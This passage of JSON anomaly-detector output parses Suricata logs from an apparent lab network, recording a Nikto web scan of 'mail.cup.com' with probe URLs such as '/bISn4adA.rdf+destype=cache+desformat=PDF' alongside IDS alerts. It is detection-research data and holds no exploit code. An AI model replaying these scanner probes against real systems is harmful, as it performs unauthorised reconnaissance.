"/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.SSIFilter\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.SSIFilter\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", 
"/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.SSIFilter\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.SSIFilter", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.SSIFilter", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 
226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46770,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46770, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":124996417115902,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 124996417115902, 
"/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.154766+0000\",\"flow_id\":124996417115902,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46770,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.SSIFilter\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.SSIFilter\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.15 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.156769 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46772 -> 192.168.10.154:80", "/parser/model/time": 1583349514.156769, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol 
Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46772, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.156769 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46772 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.16 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.TXT", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.156961+0000\",\"flow_id\":1001345839161358,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46772,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.TXT\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.TXT\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.156961, 
"/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1001345839161358,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46772,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.TXT\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.TXT\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46772,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.TXT\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.TXT\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.TXT\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", 
"/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.TXT\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.TXT", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.TXT", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": 
",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46772,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46772, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1001345839161358,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", 
"/parser/model/flow_id/flow_id/flow_id": 1001345839161358, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.156961+0000\",\"flow_id\":1001345839161358,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46772,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.TXT\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.TXT\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.16 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.159041 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46774 -> 192.168.10.154:80", "/parser/model/time": 1583349514.159041, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", 
"/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46774, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.159041 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46774 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.16 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA._", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.159362+0000\",\"flow_id\":2036518856845440,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46774,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA._\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA._\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 
1583349514.159362, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":2036518856845440,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46774,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA._\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA._\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46774,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA._\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA._\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA._\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", 
"/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA._\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA._", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA._", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", 
"/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46774,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46774, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":2036518856845440,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", 
"/parser/model/flow_id/flow_id/flow_id": 2036518856845440, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.159362+0000\",\"flow_id\":2036518856845440,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46774,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA._\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA._\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.16 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.162334 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46776 -> 192.168.10.154:80", "/parser/model/time": 1583349514.162334, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", 
"/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46776, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.162334 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46776 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.16 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.rdf+destype=cache+desformat=PDF", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.162552+0000\",\"flow_id\":1625615040672730,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46776,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.rdf+destype=cache+desformat=PDF\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) 
